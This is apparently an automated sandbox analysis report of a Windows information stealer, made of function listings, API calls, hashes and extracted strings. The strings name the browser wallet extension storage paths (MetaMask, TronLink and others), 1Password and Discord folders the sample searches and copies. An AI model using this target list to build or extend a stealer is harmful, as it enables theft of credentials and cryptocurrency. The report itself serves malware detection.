Source File: 00000016.00000002.565684394.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000016.00000002.585917097.000000000046C000.00000040.00020000.sdmp Download File

Yara matches

Similarity

API ID: CloseHandle$CreateFileModuleNameProcess
String ID:
API String ID: 2820832629-0
Opcode ID: 810330d3b76e0d043f75eeaff3566cb6c08f57faf0a55c5548bd68fed0756963
Instruction ID: 93da9dd2ce7d3f88d80043d1a0904c0d9ba37ed035759638e8c820617def2985
Opcode Fuzzy Hash: 810330d3b76e0d043f75eeaff3566cb6c08f57faf0a55c5548bd68fed0756963
Instruction Fuzzy Hash: C521A772D1024CBFEB019BA4DC81EEEB77CFF59308F005166F649A1022F6745A89CB65

Uniqueness

Uniqueness Score: -1.00%

Function 004563C2, Relevance: 6.1, APIs: 4, Instructions: 69COMMON

Download Yara Rule

APIs

GetLastError.KERNEL32(0043E6C3,0043E6C3,00000002,0044AA39,00458273,00000000,?,0044058B,00000002,00000000,?,?,?,00408EE6,0043E6C3,00000004), ref: 004563C7
_free.LIBCMT ref: 00456424
_free.LIBCMT ref: 0045645A
SetLastError.KERNEL32(00000000,00000008,000000FF,?,0044058B,00000002,00000000,?,?,?,00408EE6,0043E6C3,00000004,00000000,00000000,00000000), ref: 00456465

Memory Dump Source

Source File: 00000016.00000002.565684394.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000016.00000002.585917097.000000000046C000.00000040.00020000.sdmp Download File

Yara matches

Similarity

API ID: ErrorLast_free
String ID:
API String ID: 2283115069-0
Opcode ID: f9481404ff577a42c6e933149f2c0832953e68c885542978eee1aa723d16101a
Instruction ID: 758d7e2519c4926df4ab442014f4b4c2804f2f3a764ccfe0feea61b642ed8b05
Opcode Fuzzy Hash: f9481404ff577a42c6e933149f2c0832953e68c885542978eee1aa723d16101a
Instruction Fuzzy Hash: 5F11C6312042016B9A1136B6AC85D2F25999BC177FB66067EFD24972E3DE6D8C0E422E

Uniqueness

Uniqueness Score: -1.00%

Function 00414AE8, Relevance: 6.0, APIs: 4, Instructions: 50COMMON

Download Yara Rule

APIs

CreateTransaction.KTMW32(00000000,00000000,00000001,00000000,00000000,000000FF,00000000,?,?,00000000,?,?,00419A35,?,?,00000000), ref: 00414AFE
CopyFileTransactedA.KERNEL32(?,?,00000000,00000000,00000000,00000000,00000000), ref: 00414B24
CommitTransaction.KTMW32(00000000,?,00419A35,?,?,00000000,?,?,?,A7AA9C34,?,?,?,00000000,00000000), ref: 00414B2F
RollbackTransaction.KTMW32(00000000,?,00419A35,?,?,00000000,?,?,?,A7AA9C34,?,?,?,00000000,00000000), ref: 00414B37

Memory Dump Source

Source File: 00000016.00000002.565684394.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000016.00000002.585917097.000000000046C000.00000040.00020000.sdmp Download File

Yara matches

Similarity

API ID: Transaction$CommitCopyCreateFileRollbackTransacted
String ID:
API String ID: 2868256026-0
Opcode ID: a834f7340d13d90da43a495d04fc41fa02a1fbf3f0e811e75c1303e896cbfd79
Instruction ID: f6075fb151bd0c790ca599811f9497597255affcb6e7d58ef1400e560091330d
Opcode Fuzzy Hash: a834f7340d13d90da43a495d04fc41fa02a1fbf3f0e811e75c1303e896cbfd79
Instruction Fuzzy Hash: D2F0A471205110BFB7145B64ACC8EB7766DDB867607140626FE22C72D0E7A0EC8186B6

Uniqueness

Uniqueness Score: -1.00%

Function 0042B14D, Relevance: 6.0, APIs: 4, Instructions: 38COMMON

Download Yara Rule

APIs

CreateTransaction.KTMW32(00000000,00000000,00000001,00000000,00000000,000000FF,00000000), ref: 0042B160
RemoveDirectoryTransactedA.KERNEL32 ref: 0042B177
CommitTransaction.KTMW32(00000000,?,00000000), ref: 0042B182
RollbackTransaction.KTMW32(00000000,?,00000000), ref: 0042B18A

Memory Dump Source

Source File: 00000016.00000002.565684394.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000016.00000002.585917097.000000000046C000.00000040.00020000.sdmp Download File

Yara matches

Similarity

API ID: Transaction$CommitCreateDirectoryRemoveRollbackTransacted
String ID:
API String ID: 1201024725-0
Opcode ID: a91e9063b3194f60b90c7159f3202404b8555574ef8146d02595ce7eb23fdab4
Instruction ID: f67b26561d75e18b4af89afce1c3dcaf22d746efecc6583bb6457b7625ef7751
Opcode Fuzzy Hash: a91e9063b3194f60b90c7159f3202404b8555574ef8146d02595ce7eb23fdab4
Instruction Fuzzy Hash: EFF08272200120BFE7241B69AC5CD7B376CDB867F07500726FD66D32D0E7A49D5186BA

Uniqueness

Uniqueness Score: -1.00%

Function 00434BFD, Relevance: 6.0, APIs: 4, Instructions: 31COMMON

Download Yara Rule

APIs

GetCurrentProcess.KERNEL32(00020008,?), ref: 00434C15
OpenProcessToken.ADVAPI32(00000000), ref: 00434C1C
GetUserProfileDirectoryA.USERENV(?,?,00000200), ref: 00434C2E
CloseHandle.KERNEL32(?,?,00000200), ref: 00434C3B

Memory Dump Source

Source File: 00000016.00000002.565684394.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000016.00000002.585917097.000000000046C000.00000040.00020000.sdmp Download File

Yara matches

Similarity

API ID: Process$CloseCurrentDirectoryHandleOpenProfileTokenUser
String ID:
API String ID: 1246687928-0
Opcode ID: 9c3bed9cb9044011a9e68ac9a7150b5986c8c8d762cf1e80eb0b149608af62e0
Instruction ID: 347af4a1803cd1cdec8d288857bb95f6d662c532fcb4dcb2aca6faaad9e5965f
Opcode Fuzzy Hash: 9c3bed9cb9044011a9e68ac9a7150b5986c8c8d762cf1e80eb0b149608af62e0
Instruction Fuzzy Hash: EAF0A771600114FFEB10DBA0DD89EEF7AACEB04340F110075E801D1114E7B4DE009675

Uniqueness

Uniqueness Score: -1.00%

Function 0041AE69, Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 274COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 0041AE6E

Strings

APPDATA, xrefs: 0041AEB9, 0041AEC8
discord_files\, xrefs: 0041AF1C

Memory Dump Source

Source File: 00000016.00000002.565684394.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000016.00000002.585917097.000000000046C000.00000040.00020000.sdmp Download File

Yara matches

Similarity

API ID: H_prolog
String ID: APPDATA$discord_files\
API String ID: 3519838083-3215400379
Opcode ID: 17cbf2b2de2aed7dc40f4aa4911c62553fd1490ef905579cef382681bf22d082
Instruction ID: a1e57a51d181b35f68320d2de6cc06bae1ff1d7660864e7a117bbb254394a084
Opcode Fuzzy Hash: 17cbf2b2de2aed7dc40f4aa4911c62553fd1490ef905579cef382681bf22d082
Instruction Fuzzy Hash: D7C18D30D01248DACF05DFE5D591AEEFBB1AF59304F20806FE41577282DB781A8ACB99

Uniqueness

Uniqueness Score: -1.00%

Function 00428E67, Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 166COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 00428E6C

Part of subcall function 00410D4E: __EH_prolog.LIBCMT ref: 00410D53

Part of subcall function 00434BB3: WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,00000000,00000000,00000000,00000000,?,751469A0,?,?,00428DE6,00000000), ref: 00434BCA
Part of subcall function 00434BB3: WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,00000000,?,00000000,00000000,?,000000FF,00000000,00000000,00000000,00000000,?,751469A0), ref: 00434BF1

Part of subcall function 0043500A: __EH_prolog.LIBCMT ref: 0043500F

Strings

HyH, xrefs: 00428F10
V\\, xrefs: 00428FDB

Memory Dump Source

Source File: 00000016.00000002.565684394.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000016.00000002.585917097.000000000046C000.00000040.00020000.sdmp Download File

Yara matches

Similarity

API ID: H_prolog$ByteCharMultiWide
String ID: HyH$V\\
API String ID: 1908619432-2643774989
Opcode ID: 58c90892d56df9385c46aa3b0757a5368c94407714cf276990c627f206c2280b
Instruction ID: b08a0d300e9e6430b1f89b9b27b59039d457bdc382816eba79537c15a3beed2e
Opcode Fuzzy Hash: 58c90892d56df9385c46aa3b0757a5368c94407714cf276990c627f206c2280b
Instruction Fuzzy Hash: E5515931E041598BCB08EB79C8517FEB7B1AF89308F0481AFD80527342DE786A45CB98

Uniqueness

Uniqueness Score: -1.00%

Function 0041AC93, Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 139COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 0041AC98

Part of subcall function 00434CBE: GetEnvironmentVariableA.KERNEL32(?,?,00000104,00000000), ref: 00434D0A

Part of subcall function 0043481D: __EH_prolog.LIBCMT ref: 00434822
Part of subcall function 0043481D: _strcat.LIBCMT ref: 0043487D

Strings

poH, xrefs: 0041ACDF
1password, xrefs: 0041ACA7

Memory Dump Source

Source File: 00000016.00000002.565684394.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000016.00000002.585917097.000000000046C000.00000040.00020000.sdmp Download File

Yara matches

Similarity

API ID: H_prolog$EnvironmentVariable_strcat
String ID: 1password$poH
API String ID: 3009225943-2754301086
Opcode ID: 6a88e5312d7d3cbdce47580a3f78db3a366bbbfa52f827c95db46cb5ab87de70
Instruction ID: bced695fbb8012e88b2c8598cf8250e97c3aca01d99a05607da710ae3d738373
Opcode Fuzzy Hash: 6a88e5312d7d3cbdce47580a3f78db3a366bbbfa52f827c95db46cb5ab87de70
Instruction Fuzzy Hash: DE51B331E01248DBCF05EFF9D5915EEBBB2AF99304F20842ED41177242DB781A49CB9A

Uniqueness

Uniqueness Score: -1.00%

Function 00453034, Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 123COMMON

Download Yara Rule

Strings

C:\Users\user\AppData\Local\Temp\49B.exe, xrefs: 00453077, 0045307E, 004530B4

Memory Dump Source

Source File: 00000016.00000002.565684394.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000016.00000002.585917097.000000000046C000.00000040.00020000.sdmp Download File

Yara matches

Similarity

API ID:
String ID: C:\Users\user\AppData\Local\Temp\49B.exe
API String ID: 0-2922258189
Opcode ID: 767793c5f4b0634d505e0be534ef0d16a0402746422ea6267d3d5207bc0f6cc9
Instruction ID: 629bef46c632ea99ffbcc98ad981e01188a11d004e65027c39e98a02d6ff42a9
Opcode Fuzzy Hash: 767793c5f4b0634d505e0be534ef0d16a0402746422ea6267d3d5207bc0f6cc9
Instruction Fuzzy Hash: 62419171A00614ABDB25DFAADC819AFBBF8EB85752B10006BE800E7252D7788F45C759

Uniqueness

Uniqueness Score: -1.00%

Function 00426371, Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 114COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 00426376

Strings

A:\_Work\rc-build-v1-exe\json.hpp, xrefs: 004263F5
is_contiguous, xrefs: 004263FA

Memory Dump Source

Source File: 00000016.00000002.565684394.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000016.00000002.585917097.000000000046C000.00000040.00020000.sdmp Download File

Yara matches

Similarity

API ID: H_prolog
String ID: A:\_Work\rc-build-v1-exe\json.hpp$is_contiguous
API String ID: 3519838083-1910854552
Opcode ID: c9d5e2d6f9a56f3bae0a43229883e978ac35eb0b8e05c8282545abf42fa82af8
Instruction ID: 7ac20fae7e8d2660125ddd747a79e3b5ac5f6b6d4ae6bda76213e9fb0c85ab02
Opcode Fuzzy Hash: c9d5e2d6f9a56f3bae0a43229883e978ac35eb0b8e05c8282545abf42fa82af8
Instruction Fuzzy Hash: 894116B1E052099FCB09CFADD4406AEFBF0AF88304B15C06ED859E7341D7799945CBA9

Uniqueness

Uniqueness Score: -1.00%

Function 00442D22, Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 112COMMON

Download Yara Rule

APIs

EncodePointer.KERNEL32(00000000,?,00000000,1FFFFFFF), ref: 00442D47

Strings

MOC, xrefs: 00442D59
RCC, xrefs: 00442D61

Memory Dump Source

Source File: 00000016.00000002.565684394.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000016.00000002.585917097.000000000046C000.00000040.00020000.sdmp Download File

Yara matches

Similarity

API ID: EncodePointer
String ID: MOC$RCC
API String ID: 2118026453-2084237596
Opcode ID: 41a4d9de3295cc7acf806718c91019b965f7a181d04cdc422f1d90874ac107e0
Instruction ID: d6a82e31353064da0976e30867fc0dc937ee4dcbb23449ca2e5aa752a2c4ee9d
Opcode Fuzzy Hash: 41a4d9de3295cc7acf806718c91019b965f7a181d04cdc422f1d90874ac107e0
Instruction Fuzzy Hash: A341CC72900209EFEF15CF98CE81AEEBBB1FF08304F64409AF914A7221D3B99950DB54

Uniqueness

Uniqueness Score: -1.00%

Function 0040A2F0, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 96COMMON

Download Yara Rule

APIs

__EH_prolog2.LIBCMT ref: 0040A2F7

Strings

", ", xrefs: 0040A3BE
: ", xrefs: 0040A39F

Memory Dump Source

Source File: 00000016.00000002.565684394.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000016.00000002.585917097.000000000046C000.00000040.00020000.sdmp Download File

Yara matches

Similarity

API ID: H_prolog2
String ID: ", "$: "
API String ID: 1857396960-747220369
Opcode ID: c780b0f0001a6d0c2c01ce5f77574bbef38e3019ffe05c44a8df3e68571435e2
Instruction ID: 31979c74f1da568ff600ea178f95cf09b7a0c642ba4721751d6c0138ac7f4c0e
Opcode Fuzzy Hash: c780b0f0001a6d0c2c01ce5f77574bbef38e3019ffe05c44a8df3e68571435e2
Instruction Fuzzy Hash: C531A271A01204EFCB14DFA5D956BDEBBB5EF88704F10406FE401A7281EBB86E54CB99

Uniqueness

Uniqueness Score: -1.00%

Function 004444DC, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 66COMMON

Download Yara Rule

APIs

_free.LIBCMT ref: 0044450A
_free.LIBCMT ref: 00444530

Strings

8aH, xrefs: 00444597

Memory Dump Source

Source File: 00000016.00000002.565684394.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000016.00000002.585917097.000000000046C000.00000040.00020000.sdmp Download File

Yara matches

Similarity

API ID: _free
String ID: 8aH
API String ID: 269201875-3520659070
Opcode ID: 9d55be215dfd076c90dd021654697512201db03c1f73002629ca30742129b2e6
Instruction ID: 25e5ea79611ae470749cf1185409be6f755a851b6c95625b8e00f0f5e56a457e
Opcode Fuzzy Hash: 9d55be215dfd076c90dd021654697512201db03c1f73002629ca30742129b2e6
Instruction Fuzzy Hash: 9D11E671A042105BFB249F39AD41B5A3295A784734F180A3FFA11CBAD1D7BCD856874D

Uniqueness

Uniqueness Score: -1.00%

Function 00426077, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 52COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 0042607C

Strings

m_object != nullptr, xrefs: 0042609F
A:\_Work\rc-build-v1-exe\json.hpp, xrefs: 0042609A

Memory Dump Source

Source File: 00000016.00000002.565684394.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000016.00000002.585917097.000000000046C000.00000040.00020000.sdmp Download File

Yara matches

Similarity

API ID: H_prolog
String ID: A:\_Work\rc-build-v1-exe\json.hpp$m_object != nullptr
API String ID: 3519838083-1282721270
Opcode ID: c1c96b0c45c4a6478b5fade26a021c904b57c266bed8324f7418d95ada8508b3
Instruction ID: 8c2a82c1ed6dcdf643eb7c3c62d3d75814cea0c81c33699370e88f1a43052360
Opcode Fuzzy Hash: c1c96b0c45c4a6478b5fade26a021c904b57c266bed8324f7418d95ada8508b3
Instruction Fuzzy Hash: 4411AC716401189BC714EBA9D986E9AB7F4EF14310F60891BE444E3640D778EE40CA98

Uniqueness

Uniqueness Score: -1.00%

Function 004344DB, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 50COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 004344E0

Part of subcall function 0043439D: lstrlenW.KERNEL32(00000000), ref: 004343FF
Part of subcall function 0043439D: lstrcpyW.KERNEL32 ref: 00434417
Part of subcall function 0043439D: lstrcpyW.KERNEL32 ref: 00434423

_strlen.LIBCMT ref: 004344F4

Part of subcall function 00410D4E: __EH_prolog.LIBCMT ref: 00410D53

Strings

>dhd, xrefs: 00434521

Memory Dump Source

Source File: 00000016.00000002.565684394.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000016.00000002.585917097.000000000046C000.00000040.00020000.sdmp Download File

Yara matches

Similarity

API ID: H_prologlstrcpy$_strlenlstrlen
String ID: >dhd
API String ID: 27009005-2576709532
Opcode ID: 9f1c41566840a4b0aaf9dda47abf67b40a5c0d1d76f4eb4cba2bda85bf938d38
Instruction ID: 45ba479a4e08e6e0a5935101e2a5643f28150cb6d205ddb17e46fa15992c998d
Opcode Fuzzy Hash: 9f1c41566840a4b0aaf9dda47abf67b40a5c0d1d76f4eb4cba2bda85bf938d38
Instruction Fuzzy Hash: 48110270D011159AEB19FB65DC12FEEB7749F44308F1085AEE006A7242DA386A89CBAC

Uniqueness

Uniqueness Score: -1.00%

Function 00456517, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 47COMMON

Download Yara Rule

APIs

Part of subcall function 0045FACE: EnterCriticalSection.KERNEL32(00000000,?,00456E13,00000000,00483CB0,00000010,00444819,00000000,00000000,00000000,?,00000000,00000000,00000000), ref: 0045FAE9

FlushFileBuffers.KERNEL32(00000000,00483C90,0000000C,0045661E,00444204,00000000,?,?,00444204,00000000,?), ref: 00456560
GetLastError.KERNEL32 ref: 00456571

Strings

A:\_Work\rc-build-v1-exe\json.hpp, xrefs: 00456558

Memory Dump Source

Source File: 00000016.00000002.565684394.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000016.00000002.585917097.000000000046C000.00000040.00020000.sdmp Download File

Yara matches

Similarity

API ID: BuffersCriticalEnterErrorFileFlushLastSection
String ID: A:\_Work\rc-build-v1-exe\json.hpp
API String ID: 4109680722-4059005155
Opcode ID: b203027ca7a6a32ebed35a89b09b2f16e735ef86110385b69858410fec8af813
Instruction ID: 1a8491d2cafb6747ab8d96391044b9da11b47bedadb7d691feb78367a96a043a
Opcode Fuzzy Hash: b203027ca7a6a32ebed35a89b09b2f16e735ef86110385b69858410fec8af813
Instruction Fuzzy Hash: CF01D272A002049FC710EFA8E90565D7BF0AF49725F14412FF811EB3A2EBB8D905CB49

Uniqueness

Uniqueness Score: -1.00%

Function 0043481D, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 47COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 00434822
_strcat.LIBCMT ref: 0043487D

Strings

1password, xrefs: 0043482B

Memory Dump Source

Source File: 00000016.00000002.565684394.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000016.00000002.585917097.000000000046C000.00000040.00020000.sdmp Download File

Yara matches

Similarity

API ID: H_prolog_strcat
String ID: 1password
API String ID: 1961401309-2409847171
Opcode ID: 618a72bce8f25a8e6d16f0d1e60d3589096e7f4cee9bfdc9a3d58c45ad7aee9a
Instruction ID: 23459407a5b9e484a33e2a5ed833b2939e64005189b421e49789827333036b09
Opcode Fuzzy Hash: 618a72bce8f25a8e6d16f0d1e60d3589096e7f4cee9bfdc9a3d58c45ad7aee9a
Instruction Fuzzy Hash: 12019E71D00104AFCF08EFE9D5929FDBBB4EF09318F04116EE402B3202E7795A44CAA5

Uniqueness

Uniqueness Score: -1.00%

Function 004400AA, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 44COMMON

Download Yara Rule

APIs

IsProcessorFeaturePresent.KERNEL32(00000017), ref: 004400B5
___raise_securityfailure.LIBCMT ref: 00440172

Strings

(NE, xrefs: 00440120

Memory Dump Source

Source File: 00000016.00000002.565684394.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000016.00000002.585917097.000000000046C000.00000040.00020000.sdmp Download File

Yara matches

Similarity

API ID: FeaturePresentProcessor___raise_securityfailure
String ID: (NE
API String ID: 3761405300-2706577886
Opcode ID: 4deab6c6b988accb27977adb176ad251c5d8b3d4e9aad351f59a1147540b897d
Instruction ID: 9f1b3af2886b3af01c15ab183e7bb4a506ad04509dde8b0da68913a4dc53852e
Opcode Fuzzy Hash: 4deab6c6b988accb27977adb176ad251c5d8b3d4e9aad351f59a1147540b897d
Instruction Fuzzy Hash: D61190B49113059BF700EF55E841A487BF4FB08740B00987FEA1887364E3F895A2AF6E

Uniqueness

Uniqueness Score: -1.00%

Function 00426202, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 36COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 00426207

Strings

A:\_Work\rc-build-v1-exe\json.hpp, xrefs: 00426246
object != nullptr, xrefs: 0042624B

Memory Dump Source

Source File: 00000016.00000002.565684394.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000016.00000002.585917097.000000000046C000.00000040.00020000.sdmp Download File

Yara matches

Similarity

API ID: H_prolog
String ID: A:\_Work\rc-build-v1-exe\json.hpp$object != nullptr
API String ID: 3519838083-2355325030
Opcode ID: 9ba610921a4c488674a6cf7ff8c1bbcb41edba7088b3b7edf8359c9722eeffec
Instruction ID: 5e434ee0f9c8238350b5274f33752c3ddfacdf13f7a2cc04565f628b46c06ad9
Opcode Fuzzy Hash: 9ba610921a4c488674a6cf7ff8c1bbcb41edba7088b3b7edf8359c9722eeffec
Instruction Fuzzy Hash: 89F04FB2E402159BC725AF69940268EBFF4EBA8B51F10452FE509E7240E7B88A1487D9

Uniqueness

Uniqueness Score: -1.00%

Analysis Process: E61.exe PID: 2964 Parent PID: 3472 E61.exeCOMMON

Executed Functions

Function 00405A45, Relevance: 215.4, APIs: 6, Strings: 114, Instructions: 5408fileCOMMON

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 00405A64
_sprintf.LIBCMT ref: 00405A8D
FindFirstFileA.KERNELBASE(?,00000000,?,?,00000018), ref: 00405AA0
_sprintf.LIBCMT ref: 00405AEF

Part of subcall function 00468A5A: __output_l.LIBCMT ref: 00468AB5

Part of subcall function 00405764: __EH_prolog3.LIBCMT ref: 00405783
Part of subcall function 00405764: _sprintf.LIBCMT ref: 004057BF
Part of subcall function 00405764: FindFirstFileA.KERNEL32(?,00000000,?,?,00000014), ref: 004057D2

Part of subcall function 00402CD0: _memmove.LIBCMT ref: 00402CEF

Part of subcall function 004033B8: _memmove.LIBCMT ref: 00403409

Part of subcall function 00405764: _sprintf.LIBCMT ref: 00405838

Part of subcall function 00405764: CopyFileA.KERNEL32(?,?,00000001), ref: 004059BC
Part of subcall function 00405764: FindNextFileA.KERNEL32(?,00000000,?,?,00000014), ref: 004059ED
Part of subcall function 00405764: FindClose.KERNEL32(?,?,?,00000014), ref: 004059FE

FindNextFileA.KERNELBASE(?,00000000,?,?,00000018), ref: 0040A205
FindClose.KERNEL32(?,?,?,00000018), ref: 0040A216

Strings

CloverWallet, xrefs: 00409CE8, 00409E66
MathWallet, xrefs: 004072FB, 00407473
\Local Extension Settings\hnfanknocfeofbddgcijnmhnfnkdnaad, xrefs: 00407708
LiqualityWallet, xrefs: 00409FE4, 0040A162
\Local Extension Settings\amkmjjmmflddogmhpjloimipbofnfjih, xrefs: 00408BF8
\Local Extension Settings\cjelfplplebdjjenllpjcblmjkfcffne, xrefs: 00408174
\Sync Extension Settings\nkbihfbeogaeaoehlefnkodbefgpgknn\CURRENT, xrefs: 00406305
\IndexedDB\chrome-extension_cjelfplplebdjjenllpjcblmjkfcffne_0.indexeddb.leveldb, xrefs: 004082F0
\Sync Extension Settings\fnjhmkhhmkbjkkabndcnnogagogbneec\CURRENT, xrefs: 004095DA
\Sync Extension Settings\amkmjjmmflddogmhpjloimipbofnfjih\CURRENT, xrefs: 004089CA
BitAppWallet, xrefs: 004084CF, 00408657
iWallet, xrefs: 004087E0, 00408962
JaxxLiberty, xrefs: 00408051, 00408056, 004080C6, 004081DF, 0040835B
\Sync Extension Settings\cphhlgmgameodnhkjdmkpanlelnlohao, xrefs: 00409981
\Sync Extension Settings\cjelfplplebdjjenllpjcblmjkfcffne\CURRENT, xrefs: 00407F4B
\Sync Extension Settings\bhghoamapcdpbohphigoooaddinpkbai\CURRENT, xrefs: 0040660B
\Local Extension Settings\nhnkbkgjikgcigadomkphalanndcapjk\CURRENT, xrefs: 00409D54
\Sync Extension Settings\hpglfhgfnhbgpjdenjgmdgoeiappafln, xrefs: 00407884
\Sync Extension Settings\ibnejdfjmmkpcnlpebklmnkoeoihofec, xrefs: 004061EB
\Local Extension Settings\cphhlgmgameodnhkjdmkpanlelnlohao\CURRENT, xrefs: 00409A58
\Sync Extension Settings\nanjmdknhkinifnkgdcggcfnhdaammmj\CURRENT, xrefs: 00408FD2
\Local Extension Settings\nkbihfbeogaeaoehlefnkodbefgpgknn\CURRENT, xrefs: 00405D01
\Sync Extension Settings\fihkakfobkmkjojpchpfgcmhfjnmnfpi\CURRENT, xrefs: 004083C3
\Sync Extension Settings\nlbmnnijcnlegkjjpcfjclmcfggfefdm\CURRENT, xrefs: 00408CCE
\Local Extension Settings\fhbohimaelbohpjbbldcngcnapndodjp, xrefs: 00405FE9
\Local Extension Settings\nkddgncdjgjfcddamfgcmfnlhccnimig, xrefs: 00409504
\IndexedDB\chrome-extension_blnieiiffboillknjnepogjhkgnoapac_0.indexeddb.leveldb, xrefs: 00407E78
\IndexedDB\chrome-extension_cjelfplplebdjjenllpjcblmjkfcffne_0.indexeddb.leveldb\CURRENT, xrefs: 00408247
\Local Extension Settings\jbdaocneiiinmjbjlgalhcelgbejmnid\CURRENT, xrefs: 00407077, 00407367
\Sync Extension Settings\amkmjjmmflddogmhpjloimipbofnfjih, xrefs: 00408A76
\Local Extension Settings\nlbmnnijcnlegkjjpcfjclmcfggfefdm, xrefs: 00408EFC
\Sync Extension Settings\blnieiiffboillknjnepogjhkgnoapac\CURRENT, xrefs: 00407AD3
\Sync Extension Settings\jbdaocneiiinmjbjlgalhcelgbejmnid\CURRENT, xrefs: 00406EFB, 004071EF
\Sync Extension Settings\cphhlgmgameodnhkjdmkpanlelnlohao\CURRENT, xrefs: 004098DA
\Local Extension Settings\fnjhmkhhmkbjkkabndcnnogagogbneec\CURRENT, xrefs: 0040975C
\Local Extension Settings\gaedmjdfmmahhbjefcbgaolhhanlaolb, xrefs: 00406B2C
\Local Extension Settings\amkmjjmmflddogmhpjloimipbofnfjih\CURRENT, xrefs: 00408B4C
\Local Extension Settings\fihkakfobkmkjojpchpfgcmhfjnmnfpi\CURRENT, xrefs: 00408543
MetaMask, xrefs: 00405E8D, 00406427
\Local Extension Settings\nlbmnnijcnlegkjjpcfjclmcfggfefdm\CURRENT, xrefs: 00408E50
\Local Extension Settings\ibnejdfjmmkpcnlpebklmnkoeoihofec\CURRENT, xrefs: 00405AFC
\Local Extension Settings\nanjmdknhkinifnkgdcggcfnhdaammmj, xrefs: 00409200
\Local Extension Settings\kpfopkelmapcoipemfendmdcghnegimn\CURRENT, xrefs: 0040A050
\Local Extension Settings\nanjmdknhkinifnkgdcggcfnhdaammmj\CURRENT, xrefs: 00409154
\Local Extension Settings\fnjhmkhhmkbjkkabndcnnogagogbneec, xrefs: 00409803
\Sync Extension Settings\fhbohimaelbohpjbbldcngcnapndodjp\CURRENT, xrefs: 00406493
\Sync Extension Settings\blnieiiffboillknjnepogjhkgnoapac, xrefs: 00407B77
\Sync Extension Settings\hpglfhgfnhbgpjdenjgmdgoeiappafln\CURRENT, xrefs: 004077DB
Authenticator, xrefs: 00406717, 0040689F
\Sync Extension Settings\nlbmnnijcnlegkjjpcfjclmcfggfefdm, xrefs: 00408D7A
\Local Extension Settings\jbdaocneiiinmjbjlgalhcelgbejmnid, xrefs: 0040711B, 0040740B
TronLink, xrefs: 00405C8B, 00406291
\Sync Extension Settings\nkddgncdjgjfcddamfgcmfnlhccnimig\CURRENT, xrefs: 004092D6
\Local Extension Settings\fhbohimaelbohpjbbldcngcnapndodjp\CURRENT, xrefs: 00405F03
\Sync Extension Settings\jbdaocneiiinmjbjlgalhcelgbejmnid, xrefs: 00406FA4, 00407293
\Local Extension Settings\nkbihfbeogaeaoehlefnkodbefgpgknn, xrefs: 00405DE7
\Local Extension Settings\hnfanknocfeofbddgcijnmhnfnkdnaad\CURRENT, xrefs: 0040765F
\Local Extension Settings\ffnbelfdoeiohenkjibnmadjiehjhajb, xrefs: 00406E28
\Sync Extension Settings\nhnkbkgjikgcigadomkphalanndcapjk\CURRENT, xrefs: 00409BD6
\Sync Extension Settings\nkddgncdjgjfcddamfgcmfnlhccnimig, xrefs: 00409382
\Sync Extension Settings\gaedmjdfmmahhbjefcbgaolhhanlaolb, xrefs: 004069B0
\Local Extension Settings\nkddgncdjgjfcddamfgcmfnlhccnimig\CURRENT, xrefs: 00409458
\Sync Extension Settings\gaedmjdfmmahhbjefcbgaolhhanlaolb\CURRENT, xrefs: 00406907
\Sync Extension Settings\nkbihfbeogaeaoehlefnkodbefgpgknn, xrefs: 004063BF
\Local Extension Settings\kncchdigobghenbbaddojjnnaogfppfj, xrefs: 004088F4
\Local Extension Settings\fihkakfobkmkjojpchpfgcmhfjnmnfpi, xrefs: 004085EC
\Sync Extension Settings\nhnkbkgjikgcigadomkphalanndcapjk, xrefs: 00409C7D
\Local Extension Settings\cphhlgmgameodnhkjdmkpanlelnlohao, xrefs: 00409AFF
